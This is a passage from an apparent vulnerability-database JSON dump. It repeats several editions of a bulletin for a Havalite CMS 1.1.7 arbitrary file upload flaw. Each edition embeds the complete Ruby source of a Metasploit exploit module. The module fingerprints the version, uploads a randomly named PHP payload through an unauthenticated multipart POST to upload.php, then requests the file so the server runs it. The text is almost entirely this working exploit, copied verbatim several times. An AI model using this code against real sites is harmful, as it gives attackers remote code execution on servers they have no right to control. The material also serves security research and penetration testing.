prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2017-10-18T07:04:27", "differentElements": ["modified", "published"], "edition": 6}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-01-06T20:00:39", "history": [], "viewCount": 1, "enchantments": {"score": {"modified": "2018-01-06T20:00:39", "value": 6.0}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-01-06T20:00:39", "differentElements": ["modified", "published"], "edition": 7}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-01-06T22:00:37", "history": [], "viewCount": 1, "enchantments": {"score": {"modified": "2018-01-06T22:00:37", "value": 6.0}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-01-06T22:00:37", "differentElements": ["modified", "published"], "edition": 8}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-01-08T04:04:09", "history": [], "viewCount": 1, "enchantments": {"score": {"modified": "2018-01-08T04:04:09", "value": 6.0}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-01-08T04:04:09", "differentElements": ["modified", "published"], "edition": 9}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-01-08T06:04:32", "history": [], "viewCount": 1, "enchantments": {"score": {"modified": "2018-01-08T06:04:32", "value": 6.0}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-01-08T06:04:32", "differentElements": ["modified", "published"], "edition": 10}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-01-20T08:04:36", "history": [], "viewCount": 1, "enchantments": {"score": {"modified": "2018-01-20T08:04:36", "value": null}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-01-20T08:04:36", "differentElements": ["modified", "published"], "edition": 11}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-01-20T10:03:06", "history": [], "viewCount": 1, "enchantments": {"score": {"modified": "2018-01-20T10:03:06", "value": 6.0}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n 